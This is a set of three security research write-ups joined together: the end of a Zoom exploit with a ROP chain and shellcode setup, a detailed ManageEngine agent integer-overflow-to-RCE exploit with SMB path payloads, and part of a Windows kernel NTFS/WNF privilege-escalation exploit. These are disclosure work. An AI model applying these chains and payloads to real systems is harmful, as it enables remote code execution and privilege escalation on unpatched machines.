KERNEL32_STR = GIF_BASE + 0x6c  # Location of UTF-16 Kernel32.dll string
VIRTUALPROTECT_STR = GIF_BASE + 0x86 # Location of VirtualProtect string

KNOWN_MAPPED = 0x2fe451e4

JMP_GETMODULEHANDLEW = crypto_base + 0x1c5c36 # jmp GetModuleHandleW
JMP_GETPROCADDRESS = crypto_base + 0x1c5c3c # jmp GetProcAddress

RET = crypto_base + 0xdc28 # ret
POP_RET = crypto_base + 0xdc27 # pop ebp; ret
ADD_ESP_24 = crypto_base + 0x6c42e # add esp, 0x18; ret

PUSH_EAX_STACK = crypto_base + 0xdbaa9 # mov dword ptr [esp + 0x1c], eax; call ebx
POP_EBX = crypto_base + 0x16cfc # pop ebx; ret
JMP_EAX = crypto_base + 0x23370 # jmp eax

rop_stack = [
VTABLE,     # pop edi
GIF_BASE + 0x101f4, # pop esi
GIF_BASE + 0x101f4, # pop ebx
KNOWN_MAPPED + 0x20, # pop ebp
JMP_GETMODULEHANDLEW,
POP_EBX,
KERNEL32_STR,

ADD_ESP_24,
PUSH_EAX_STACK,
0x41414141,
POP_RET, # Not used, padding for other objects
0x41414141,
0x41414141,
0x41414141,
JMP_GETPROCADDRESS,
JMP_EAX,
KNOWN_MAPPED + 0x10, # This will be overwritten with the base address of Kernel32.dll
VIRTUALPROTECT_STR,
SHELLCODE,
SHELLCODE & 0xfffff000,
0x1000,
0x40,
SHELLCODE - 8,
]

And that’s it! We now had a reverse shell and could launch calc.exe.

Reliability, reliability, reliability

The last week before the contest was focused on getting it to an acceptable reliability level. As we mentioned in the info leak, this phase was very tricky. It took a lot of time to get it to having even a tiny chance to succeed. We had to overwrite a lot of data here, but the application had to remain stable enough that we could still perform the second phase without crashing.

There were a lot of things we did to improve the reliability and many more we tried and gave up. These can be summarized in two categories: decreasing the chance that we overwrote something we shouldn’t and decreasing the chance that the client would crash when we had overwritten something we didn’t intend to.

In the second phase, it could happen that we overwrote the vtable of a different object. Whenever we had a crash like this, we would try to fix it by placing a compatible no-op function on the corresponding place in the vtable. This is harder than it sounds on 32-bit Windows, because there are multiple calling conventions involved and some require the RET instruction to pop the arguments from the stack, which means that we needed a no-op that pops the right number of values.

In the first phase, we also had a chance of overwriting pointers in objects in the same size range. We could not yet deal with function pointers or vtables as we had no info leak, but we could place pointers to readable/writable memory. We started our exploit by uploading some GIF files to create known addresses with controlled data before this phase so we could use those addresses in the data we used for the overflow. Of course, the data in the GIF files could again be dereferenced as a pointer, requiring multiple layers of fake addresses.

What may not yet be clear is that each attempt required a slow manual process. Each time we wanted to run our exploit, we would launch the client, clear all chat messages for the victim, exit the client and launch it again. Because the memory layout was so important, we had to make sure we started from an identical state each time. We had not automated this, because we were paranoid about ensuring the client would be used in exactly the same way as during the contest. Anything we did differently could influence the heap layout. For example, we noticed that adding network interception could have some effect on how network requests were allocated, changing the heap layout. Our attempts were often close to 5 minutes, so even just doing 10 attempts took an hour. To assess if a change improved the reliability, 10 runs was pretty low.

Both the info leak and the vtable overwrite phase run in loops. If we were lucky, we had success in the first iteration of the loop, but it could go on for a long time. To improve our chance of success in the time limit, our exploit would slowly increase the risk it took the more iterations it needed. In the first iteration we would only overflow a small number of times and only one object, but this would increase to more and more overflows with larger sizes the longer it took.

In the second phase we could take more risks. The application did not need to remain stable enough for another phase and we only needed two adjacent allocations, not also a third unallocated block. By overwriting 10 blocks further, we had a very good chance of hitting the needed object with just one or two iterations.

In the end, we estimated that our exploit had about a 50% chance of success in the 5 minutes. If, on the other hand, we could leak the address of libcrypto-1_1.ddl in one run and then skip the info leak in the next run (the locations of ASLR randomized dlls remain the same on Windows for some time), we could increase our reliability to around 75%. ZDI informed us during the contest that this would result in a partial win, but it never got to the point where we could do that. The first attempt failed in the first phase.

Conclusion

After we handed in our final exploit the nerve-wracking process of waiting started. Since we needed to hand in our final exploit two days before the event and the organizers would not run our exploit until our attempt, it was out of our hands. Even during the attempts we could not see the attacker’s screen, for example, so we had no idea if everything worked as planned. The enormous relief when calc.exe popped up made it worth it in the end.

In total we spend around 1.5 weeks from the start of our research until we had the main vulnerability of our exploit. Writing and testing the exploit itself took another 1.5 months, including the time we needed to read up on all Windows internals we needed for our exploit.

We would like to thank ZDI and Zoom for organizing this year’s event, and hopefully see you guys next year!

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

A couple months back, Chris Lyne and I had a look at ManageEngine ServiceDesk Plus. This product consists of a server / agent model in which agents provide updates on machine status back to the Manage Engine server. Chris ended up finding an unauth XSS-to-RCE chain in the server component which you can read here: https://medium.com/tenable-techblog/stored-xss-to-rce-chain-as-system-in-manageengine-servicedesk-plus-493c10f3e444, allowing an attacker to fully compromise the server with SYSTEM privileges.

The blog here will go over the exploitation of an integer overflow that I found in the agents themselves (CVE-2021–20082) called Asset Explorer Agent. This exploit could allow an attacker to pivot the network once the ManageEngine server is compromised. Alternatively, this could be exploited by spoofing the ManageEngine server IP on the network and triggering this vulnerability as we will touch on later. While this PoC is not super reliable, it has been proven to work after several tries on a Windows 10 Pro 20H2 box (see below). I believe that further work on heap grooming could increase exploitation odds.

Linux machine (left), remotely exploiting integer overflow in ManageEngine Asset Explorer running on Windows 10 (right) and popping up a “whoami” dialog.

Attack Vector

The ManageEngine Windows agent executes as a SYSTEM service and listens on the network for commands from its ManageEngine server. While TLS is used for these requests, the agent never validates the certificate, so anyone on the network is able to perform this TLS handshake and send an unauthorized command to the agent. In order for the agent to run the command however, the agent expects to receive an authtoken, which it echos back to its configured server IP address for final approval. Only then will the agent carry out the command. This presents a small problem since that configured IP address is not ours, and instead asks the real Manage Engine server to approve our sent authtoken, which is always going to be denied.

There is a way an attacker can exploit this design however and that’s by spoofing their IP on the network to be the Manage Engine server. I mentioned certs are not validated which allows an attacker to send and receive requests without an issue. This allows full control over the authtoken approval step, resulting in the agent running any arbitrary agent command from an attacker.

From here, you may think there is a command that can remotely run tasks or execute code on agents. Unfortunately, this was not the case, as the agent is very lightweight and supports a limited amount of features, none of which allowed for logical exploitation. This forced me to look into memory corruption in order to gain remote code execution through this vector. From reverse engineering the agents, I found a couple of small memory handling issues, such as leaks and heap overflow with unicode data, but nothing that led me to RCE.

Integer Overflow

When the agent receives final confirmation from its server, it is in the form of a POST request from the Manage Engine server. Since we are assuming the attacker has been able to insert themselves as a fake Manage Engine server or have compromised a real Manage Engine server, this allows them to craft and send any POST response to this agent.

When the agent processes this POST request, WINAPIs for HTTP handling are used. One of which is HttpQueryInfoW, which is used to query the incoming POST request for its “Content-Size” field. This Content-Size field is then used as a size parameter in order to allocate memory on the heap to copy over the POST payload data.

There is some integer arithmetic performed between receiving the Content-Size field and actually using this size to allocate heap memory. This is where we can exploit an integer overflow.

Here you can see the Content-Size is incremented by one, multiplied by four, and finally incremented by an extra two bytes. This is a 32-bit agent, using 32-bit integers, which means if we supply a Content-Size field the size of UINT32_MAX/4, we should be able to overflow the integer to wrap back around to size 2 when passed to calloc. Once this allocation of only two bytes is made on the heap, the following API InternetReadFile, will copy over our POST payload data to the destination buffer until all its POST data contents are read. If our POST data is larger than two bytes, then that data will be copied beyond the two byte buffer resulting in heap overflow.

Things are looking really good here because we not only can control the size of the heap overflow (tailoring our post data size to overwrite whatever amount of heap memory), but we also can write non-printable characters with this overflow, which is always good for exploiting write conditions.

No ASLR

Did I mention these agents don’t support ASLR? Yeah, they are compiled with no relocation table, which means even if Windows 10 tries to force ASLR, it can’t and defaults the executable base to the PE ImageBase. At this point, exploitation was sounding too easy, but quickly I found…it wasn’t.

Creating a Write Primitive

I can overwrite a controlled amount of arbitrary data on the heap now, but how do I write something and somewhere…interesting? This needs to be done without crashing the agent. From here, I looked for pointers or interesting data on the heap that I could overwrite. Unfortunately, this agent’s functionality is quite small and there were no object or function pointers or interesting strings on the heap for me to overwrite.

In order to do anything interesting, I was going to need a write condition outside the boundaries of this heap segment. For this, I was able to craft a Write-AlmostWhat-Where by abusing heap cell pointers used by the heap manager. Asset Explorer contains Microsoft’s CRT heap library for managing the heap. The implementation uses a double-linked list to keep track of allocated cells, and generally looks something like this:

Just like when any linked list is altered (in this case via a heap free or heap malloc), the next and prev pointers must be readjusted after insertion or deletion of a node (seen below).

For our attack we will be focusing on exploiting the free logic which is found in the Microsoft Free_dbg API. When a heap cell is freed, it removes the target node and remerges the neighboring nodes. Below is the Free_dbg function from Microsoft library, which uses _CrtMemBlockHeader for its heap cells. The red blocks are the remerging logic for these _CrtMemBlockHeader nodes in the linked list.

This means if we overwrite a _CrtMemBlockHeader* prev pointer with an arbitrary address (ideally an address outside of this cursed memory segment we are stuck in), then upon that heap cell being freed, the contents of this arbitrary *prev address will have the _CrtMemBlockHeader* next pointer written to where *prev points to. It gets better…we can also overflow into the _CrtMemBlockHeader* next pointer as well, allowing us to control what * next is, thus creating an arbitrary write condition for us — one DWORD at a time.

There is a small catch, however. The _CrtMemBlockHeader* next and _CrtMemBlockHeader* prev are both dereferenced and written to in this remerging logic, which means I can’t just overwrite *prev pointer with any arbitrary data I want, as this must also be a valid pointer in writable memory location itself, since its contents will also be written to during the Free_dbg function. This means I can only write pointers to places in memory and these pointers must point to writable memory themselves. This prevents me from writing executable memory pointers (as that points to RX protected memory) as well as preventing me from writing pointers to non-existent memory (as the dereference step in Free_dbg will cause access violation). This proved to be very constraining for my exploitation.

Data-Only Attack

Data-only attacks are getting more popular for exploiting memory corruption bugs, and I’m definitely going to opt for that here. This binary has no ASLR to worry about, so browsing the .data section of the executable and finding an interesting global variable to overwrite is the best step. When searching for these, many of the global variables point to strings, which seem cool — but remember, it will be very hard to abuse my write primitive to overwrite string data, since the string data I would want to write must represent a pointer to valid and writable memory in the program. This limits me to searching for an interesting global variable pointer to overwrite.

Step 1 : Overwrite the Current Working Directory

I found a great candidate to leverage this pointer write primitive. It is a global variable pointer in Asset Explorer’s .data section that points to a unicode string that dictates the current working directory of the Manage Engine agent.

We need to know how this is used in order to abuse it correctly, and a few XREFs later, I found this string pointer is dereferenced and passed to SetCurrentDirectory whenever a “NEWSCAN” request is sent to the agent (which we can easily do as a remote attacker). This call dynamically changes the current working directory for the remote Asset Explorer service which is what I shoot for in developing an exploit. Even better, the NEWSCAN request then calls “CreateProcess” to execute a .bat file from the current working directory. If we can modify this current working directory to point to a remote SMB share we own, and place a malicious .bat file on our SMB share with the same name, then Asset Explorer will try to execute this .bat file off our SMB share instead of the local one, resulting in RCE. All we need to do is modify this pointer so that it points to a malicious remote SMB path we own, trigger a NEWSCAN request so that the current working directory is changed, and make it execute our .bat file.

Since ASLR is not enabled, I know what this pointer address will be, so we just need to trigger our heap overflow to exploit my pointer write condition with Free_dbg to replace this pointer.

To effectively change this current working directory, you would need to:

1. Trigger the heap overflow to overwrite the *next and *prev pointers of a heap cell that will be freed (medium)

2. Overwrite the *next pointer with the address of this current working directory global variable as it will be the destination for our write primitive (easy)

3. Overwrite the *prev pointer with a pointer that points to a unicode string of our SMB share path (hard).

4. Trigger new scan request to change current working directory and execute .bat file (easy)

For step 1, this ideally would require some grooming, so we can trigger our overflow once our cell is flush against another heap cell and carefully overwrite its _CrtMemBlockHeader. Unfortunately my heap grooming attempts were not working to force allocations where I wanted. This is partially due to the limited size I was able to remotely allocate in the remote process and a large part of my limited Windows 10 heap grooming experience. Luckily, there was pretty much no penalty for failed overflow attempts since I am only overwriting the linked list pointers of heap cells and the heap manager was apparently very ok with that. With that in mind, I run my heap overflow several times and hope it writes over a particular existing heap cell with my write primitive payload. I found ~20 attempts of this overflow will usually end up working to overflow the heap cell I want.

What is the heap cell I want? Well, I need it to be a heap cell which will be freed because that’s the only way to trigger my arbitrary write. Also, I need to know where I sprayed my malicious SMB path string in heap memory, since I need to overwrite the current working directory global variable with a pointer to my string. Without knowing my own string address, I have no idea what to write. Luckily I found a way to get around this without needing an infoleak.

Bypassing the Need for Infoleak

In my PoC I am initially sending a string of to the agent:

XXXXXXXX1#X#X#XXXXXXXX3#XXXXXXXX2#//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/

Asset Explorer will parse this string out once received and allocate a unicode string for each substring delimited by “#” symbols. Since the heap is allocated in a doubly linked list fashion, the order of allocations here will be sequentially appended in the linked list. So, what I need to do is overflow into the heap cell headers for the “XXXXXXXX2” string with understanding that its _CrtMemBlockHeader* next pointer will point to the next heap cell to be allocated, which is always the //.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/ string.

If we overwrite the _CrtMemBlockHeader* prev with the .data address of the current working directory path, and only overwrite the first (lowest order) byte of the _CrtMemBlockHeader* prev pointer then we won’t need an info leak. Since the upper three bytes dictate the SMB string’s general memory address, we just need to offset the last byte so that it will point to the actual string data rather than the _CrtMemBlockHeader structure it currently points to. This is why I choose to overwrite the lowest order byte with “0xf8”, so guarantee max offset from _CrtMemBlockHeader.

It’s beneficial if we can craft an SMB path string that contains pre-pended nonsense characters to it (similar to nop-sled but for file path). This will give us greater probability that our 0xf8 offset points somewhere in our SMB path string that allows SetCurrentDirectory to interpret it as a valid path with prepended nonsense characters (ie: .\.\.\.\.\<path>). Unfortunately, .\.\.\.\ wouldn’t work for SMB share, so with thanks to Chris Lyne, he was able to craft a nice padded SMB path like this for me:

//.//.//.//.//.//UNC//<ip_address>/a/

This will allow the path to be simply treated as “//<ip_address>/a/”. If we provide enough “//.” in front of our path, we will have about a ⅓ chance of this hitting our sled properly when overwriting the lowest *prev byte 0xf8. Much better odds than if I used a simple straight forward SMB string.

I ran my exploit, witnessed it overwrite the current working directory, and then saw Asset Explorer attempt to execute our .bat file off our remote SMB share…but it wasn’t working. It was that day when I learned .bat files cannot be executed off remote SMB shares with CreateProcess.

Step 2: Hijacking Code Flow

I didn’t come this far to just give up, so we need to look at a different technique to turn our current working directory modification into remote code execution. Libraries (.dll files) do not have this restriction, so I search for places where Asset Explorer might try to load a library. This is a tough ask, because it has to be a dynamic loading of a library (not super common for applications to do) that I can trigger, and also — it cannot be a known dll (ie: kernel32.dll, rpcrt4.dll, etc), since search order for these .dlls will not bother with the application’s current working directory, but rather prioritize loading from a Windows directory. For this I need to find a way to trigger the agent to load an unknown dll.

After searching, I found a function called GetPdbDll in the agent where it will attempt to dynamically load “Mspdb80.dll”, a debugging dll used for RTC (runtime checks). This is an unknown dll so it should attempt to load it off it’s current working directory. Ok, so how do I call this thing?

Well, you can’t… I couldn’t find any XREFs to code flow that could end up calling this function, I assumed it was left in stubs from the compiler, as I couldn’t even find indirect calls that might lead code flow here. I will have to abandon my data-only attack plan here and attempt to hijack code flow for this last part.

I am unable to write executable pointers with my write primitive, so this means I can’t just write this GetPdbDll function address as a return address on stack memory nor can I even overwrite a function pointer with this function address. There was one place however, that I saw a pointer TO a function pointer being called which is actually possible for me to abuse. It’s in _CrtDbgReport function, which allows Microsoft runtime to alert in event of various integrity violations, one of which is a failure in heap integrity check. When using a debug heap (like in this scenario) it can be triggered if it detects unwritten portions of heap memory not containing “0xfd” bytes, since that is supposed to represent “dead-land-fill” (this is why my PoC tries to mimic these 0xfd bytes during my heap overflow, to keep this thing happy). However this time…we WANT to trigger a failure, because in _CrtDbgReport we see this:

From my research, this is where _CrtDbgReport calls a _pfnReportHook (if the application has one registered). This application does not have one registered, but let us leverage our Free_dbg write primitive again to write our own _pfnReportHook (it lives in .data section too!). This is also great because this doesn’t have to be a pointer to executable memory (which we can’t write), because _pfnReportHook contains a pointer TO a function pointer (big beneficial difference for us). We just need to register our own _pfnReportHook that contains a function pointer to that function that loads “MSPDB80.dll” (no arguments needed!). Then we trigger a heap error so that _CrtDbgReport is called and in turn calls our _pfnReportHook. This should load and execute the “MSPDB80.dll” off our remote SMB share. We have to be clever with our second write primitive, as we can no longer borrow the technique I used earlier where you use subsequent heap cell allocations to bypass infoleak. This is because the unique scenario was only for unicode strings in this application, and we can’t represent our function pointers with unicode. For this step I choose to overwrite the _pfnReportHook variable with a random offset in my heap entirely (again, no infoleak required, similar technique as partially overwriting the _CrtMemBlockHeader* next pointer but this time overwriting the lower two bytes of the _CrtMemBlockHeader* next pointer in order to obtain a decent random heap offset). I then trigger my heap overflow again in order to clobber an enormous portion of the heap with repeating function pointers to the GetPdb function.

Yes this will certainly crash the program but that’s ok! We are at the finish line and this severe heap corruption will trigger a call to our _pfnReportHook before a crash happens. From our earlier overwrite, our _pfnReportHook pointer should point to some random address in my heap which likely contains a GetPdbDll function pointer (which I massively sprayed). This should result in RCE once _pfnReportHook is called.

Loading dll off remote SMB share that displays a whoami

As mentioned, this is not a super reliable exploit as-is, but I was able to prove it can work. You should be able to find the PoC for this on Tenable’s PoC github — https://github.com/tenable/poc. Manage Engine has since patched this issue. For more of these details you can check out this ManageEngine advisory at https://www.tenable.com/security/research.


Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2

Introduction

In part 1 the aim was to cover the following:

  • An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger

  • An introduction into the Windows Notification Framework (WNF) from an exploitation perspective

  • Exploit primitives which can be built using WNF

In this article I aim to build on that previous knowledge and cover the following areas:

  • Exploitation without the CVE-2021-31955 information disclosure

  • Enabling better exploit primitives through PreviousMode

  • Reliability, stability and exploit clean-up

  • Thoughts on detection

The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.

Exploitation without CVE-2021-31955 information disclosure

I hinted in the previous blog post that this vulnerability could likely be exploited without the usage of the separate EPROCESS address leak vulnerability CVE-2021-31955). This was also realised too by Yan ZiShuang and documented within the blog post.

Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution then the aim will be to escalate privileges for their associated userland process or pan a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the process’s security context and contains things such as the token privileges, token types, session id etc.

CVE-2021-31955 lead to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to be used by the in-the-wild attacks found by Kaspersky. However, in practice for exploitation of CVE-2021-31956 this separate vulnerability is not needed.

This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Therefore, provided that it is possible to get a relative read/write primitive using a _WNF_STATE_DATA to be able to read and{write to a subsequent _WNF_NAME_INSTANCE, we can then overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.

The initial pool layout we are aiming is as follows:

The difficulty with this is that due to the low fragmentation heap (LFH) randomisation, it makes reliably achieving this memory layout more difficult and iteration one of this exploit stayed away from the approach until more research was performed into improving the general reliability and reducing the chances of a BSOD.

As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:

In the absense of an LFH "Heap Randomisation" weakness or vulnerability, then this post explains how it is possible to achieve a "reasonably" high level of exploitation success and what necessary cleanups need to occur in order to maintain system stability post exploitation.

Stage 1: The Spray and Overflow

Starting from where we left off in the first article, we need to go back and rework the spray and overflow.

Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.

We also need to spray _WNF_STATE_DATA objects of size 0xA0 (which when added with the header 0x10 + the POOL_HEADER (0x10) we also end up with a chunk allocated of 0xC0.

As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.

However, we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take a similar approach of free’ing holes as in the past article and then reusing the resulting holes, as both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time, and we need both present within the same pool segment.

Therefore, we need to be very careful with the overflow. We make sure that only the following fields are overflowed by 0x10 bytes (and the POOL_HEADER).

In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF

In the case of a corrupted _WNF_STATE_DATA, the Header, AllocatedSize, DataSize and ChangeTimestamp members will be overflowed:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

As we don’t know if we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, then we can trigger the overflow and check for corruption by loop through querying each _WNF_STATE_DATA using NtQueryWnfStateData.

If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.

There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:

  1. We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.

  2. Occasionally our unbounded _WNF_STATA_DATA containing chunk can be allocated within the final block within the pool segment. This means that when querying with NtQueryWnfStateData an unmapped memory read will occur off the end of the page. This rarely happens in practice and increasing the spray size reduces the likelihood of this occurring (see Exploit Testing and Statistics section).

  3. Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. By performing a large spray size before triggering the overflow, from practical testing, this seems to rarely happen within the test environment.

I think it’s useful to document these challenges with modern memory corruption exploitation techniques where it’s not always possible to gain 100% reliability.

Overall with 1) remediated and 2+3 only occurring very rarely, in lieu of a perfect solution we can move to the next stage.

Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer

Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above, and within the first blog post, then we can then use the relative read to locate an adjacent _WNF_NAME_INSTANCE.

By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.

The CreatorProcess, StateName, StateData, ScopeInstance can be disclosed from the identified target object.

We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.

Care needs to be taken here to ensure that the new location StateData points at overlaps with sane values for the AllocatedSize, DataSize values preceding the data wishing to be read or written.

In this case the aim was to achieve a full arbitrary read and write but without having the constraints of needing to find sane and reliable AllocatedSize and DataSize values prior to the memory which it was desired to write too.

Our overall goal was to target the KTHREAD structure’s PreviousMode member and then make use of make use of the APIs NtReadVirtualMemory and NtWriteVirtualMemory to enable a more flexible arbitrary read and write.

It helps to have a good understanding of how these kernel memory structure are used to understand how this works. In a massively simplified overview, the kernel mode portion of Windows contains a number of subsystems. The hardware abstraction layer (HAL), the executive subsystems and the kernel. _EPROCESS is part of the executive layer which deals with general OS policy and operations. The kernel subsystem handles architecture specific details for low level operations and the HAL provides a abstraction layer to deal with differences between hardware.

Processes and threads are represeted at both the executive and kernel "layer" within kernel memory as _EPROCESS and _KPROCESS and _ETHREAD and _KTHREAD structures respectively.

The documentation on PreviousMode states "When a user-mode application calls the Nt or Zw version of a native system services routine, the system call mechanism traps the calling thread to kernel mode. To indicate that the parameter values originated in user mode, the trap handler for the system call sets the PreviousMode field in the thread object of the caller to UserMode. The native system services routine checks the PreviousMode field of the calling thread to determine whether the parameters are from a user-mode source."

Looking at MiReadWriteVirtualMemory which is called from NtWriteVirtualMemory we can see that if PreviousMode is not set when a user-mode thread executes, then the address validation is skipped and kernel memory space addresses can be written too:

__int64 __fastcall MiReadWriteVirtualMemory(
        HANDLE Handle,
        size_t BaseAddress,
        size_t Buffer,
        size_t NumberOfBytesToWrite,
        __int64 NumberOfBytesWritten,
        ACCESS_MASK DesiredAccess)
{
  int v7; // er13
  __int64 v9; // rsi
  struct _KTHREAD *CurrentThread; // r14
  KPROCESSOR_MODE PreviousMode; // al
  _QWORD *v12; // rbx
  __int64 v13; // rcx
  NTSTATUS v14; // edi
  _KPROCESS *Process; // r10
  PVOID v16; // r14
  int v17; // er9
  int v18; // er8
  int v19; // edx
  int v20; // ecx
  NTSTATUS v21; // eax
  int v22; // er10
  char v24; // [rsp+40h] [rbp-48h]
  __int64 v25; // [rsp+48h] [rbp-40h] BYREF
  PVOID Object[2]; // [rsp+50h] [rbp-38h] BYREF
  int v27; // [rsp+A0h] [rbp+18h]

  v27 = Buffer;
  v7 = BaseAddress;
  v9 = 0i64;
  Object[0] = 0i64;
  CurrentThread = KeGetCurrentThread();
  PreviousMode = CurrentThread->PreviousMode;
  v24 = PreviousMode;
  if ( PreviousMode )
  {
    if ( NumberOfBytesToWrite + BaseAddress < BaseAddress
      || NumberOfBytesToWrite + BaseAddress > 0x7FFFFFFF0000i64
      || Buffer + NumberOfBytesToWrite < Buffer
      || Buffer + NumberOfBytesToWrite > 0x7FFFFFFF0000i64 )
    {
      return 3221225477i64;
    }
    v12 = (_QWORD *)NumberOfBytesWritten;
    if ( NumberOfBytesWritten )
    {
      v13 = NumberOfBytesWritten;
      if ( (unsigned __int64)NumberOfBytesWritten >= 0x7FFFFFFF0000i64 )
        v13 = 0x7FFFFFFF0000i64;
      *(_QWORD *)v13 = *(_QWORD *)v13;
    }
  }

This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.

So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.

dt _EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS

Within _KPROCESS we have the following:

 dx -id 0,0,ffffd186087b1300 -r1 (*((ntdll!_KPROCESS *)0xffffd186087b1300))
(*((ntdll!_KPROCESS *)0xffffd186087b1300))                 [Type: _KPROCESS]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] ProfileListHead  [Type: _LIST_ENTRY]
    [+0x028] DirectoryTableBase : 0xa3b11000 [Type: unsigned __int64]
    [+0x030] ThreadListHead   [Type: _LIST_ENTRY]
    [+0x040] ProcessLock      : 0x0 [Type: unsigned long]
    [+0x044] ProcessTimerDelay : 0x0 [Type: unsigned long]
    [+0x048] DeepFreezeStartTime : 0x0 [Type: unsigned __int64]
    [+0x050] Affinity         [Type: _KAFFINITY_EX]
    [+0x0f8] AffinityPadding  [Type: unsigned __int64 [12]]
    [+0x158] ReadyListHead    [Type: _LIST_ENTRY]
    [+0x168] SwapListEntry    [Type: _SINGLE_LIST_ENTRY]
    [+0x170] ActiveProcessors [Type: _KAFFINITY_EX]
    [+0x218] ActiveProcessorsPadding [Type: unsigned __int64 [12]]
    [+0x278 ( 0: 0)] AutoAlignment    : 0x0 [Type: unsigned long]
    [+0x278 ( 1: 1)] DisableBoost     : 0x0 [Type: unsigned long]
    [+0x278 ( 2: 2)] DisableQuantum   : 0x0 [Type: unsigned long]
    [+0x278 ( 3: 3)] DeepFreeze       : 0x0 [Type: unsigned long]
    [+0x278 ( 4: 4)] TimerVirtualization : 0x0 [Type: unsigned long]
    [+0x278 ( 5: 5)] CheckStackExtents : 0x0 [Type: unsigned long]
    [+0x278 ( 6: 6)] CacheIsolationEnabled : 0x0 [Type: unsigned long]
    [+0x278 ( 9: 7)] PpmPolicy        : 0x7 [Type: unsigned long]
    [+0x278 (10:10)] VaSpaceDeleted   : 0x0 [Type: unsigned long]
    [+0x278 (31:11)] ReservedFlags    : 0x0 [Type: unsigned long]
    [+0x278] ProcessFlags     : 896 [Type: long]
    [+0x27c] ActiveGroupsMask : 0x1 [Type: unsigned long]
    [+0x280] BasePriority     : 8 [Type: char]
    [+0x281] QuantumReset     : 6 [Type: char]
    [+0x282] Visited          : 0 [Type: char]
    [+0x283] Flags            [Type: _KEXECUTE_OPTIONS]
    [+0x284] ThreadSeed       [Type: unsigned short [20]]
    [+0x2ac] ThreadSeedPadding [Type: unsigned short [12]]
    [+0x2c4] IdealProcessor   [Type: unsigned short [20]]
    [+0x2ec] IdealProcessorPadding [Type: unsigned short [12]]
    [+0x304] IdealNode        [Type: unsigned short [20]]
    [+0x32c] IdealNodePadding [Type: unsigned short [12]]
    [+0x344] IdealGlobalNode  : 0x0 [Type: unsigned short]
    [+0x346] Spare1           : 0x0 [Type: unsigned short]
    [+0x348] StackCount       [Type: _KSTACK_COUNT]
    [+0x350] ProcessListEntry [Type: _LIST_ENTRY]
